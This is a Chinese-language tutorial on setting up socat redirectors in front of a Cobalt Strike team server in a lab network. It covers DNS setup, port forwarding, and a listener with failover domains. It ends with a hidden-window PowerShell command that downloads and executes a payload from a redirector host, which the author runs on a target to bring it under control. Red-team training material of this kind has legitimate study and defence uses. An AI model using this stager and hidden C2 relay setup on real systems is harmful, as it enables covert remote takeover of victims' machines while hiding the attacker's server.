Cobalt Strike（二）使用重定器

一.简介

“重定器”是一个在“cobalt strike”服务器和目标网络之间的服务器。这个“重定器”的作用是对你团队服务器下的连接，进行任意的连接或返回。（注：即通常说的代理服务器或端口转发工具）“重定器”服务（在攻击和防御中）是很重要的角色。

第一保护服务器地址，并作为攻击者，它也是一个很好的安全操作。

第二 它给予了一些很好的适应能力 假如你们的工具中有一两个堵塞了没有大不了的，也可以进行通信。

工具socat （一款端口重定向工具） 我们用它来建立80端口上的连接管理，并且继续在80端口运行那个连接团队服务器的连接。

用“重定向”和”cobalt strike”一起使用。

在linux系统上使用命令

二.设置环境

域名 team.com

dns服务器 192.168.1.107

teamserver 192.168.1.53   t.team.com

ubuntu 192.168.1.109 r1.team.com

ubuntu 192.168.1.120 r2.team.com

配置DNS管理器        

新建区域，一直下一步

 新建主机

 设置DNS成功

在每个重定向的Ubuntu上用socat进行转发

socat TCP4-LISTEN:80,fork TCP4:t.team.com:80

这里出现了很多问题，开始的时候没有socat，apt-get install socat 不好使，搜索更改DNS服务器为

sudo vi /etc/resolv.conf

增加nameserver8.8.8.8

重启网络 service network-manager restart

也不好使，后来发现加上sudo就可以安装了

sudo apt-get install socat

测试重定向是否正常

打开cobalt strike  web日志 浏览器访问

http://r1.team.com/r1

http://r2.team.com/r2

http://r3.team.com/r3

日志信息正确接下来就是

在cobalt strike 里创建监听器

 

填写两个域名分别是r2.cskali.com,r3.cskali.com 当其中一个断开或者堵塞的时候会自动访问另外一个。

接下来创建powershell

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r3.cskali.com:80/a'))"

在目标上运行指令 目标上线

 至此成功！！！

 ——————————————————————绝对清澈，绝对透明，绝对空灵，就是深邃。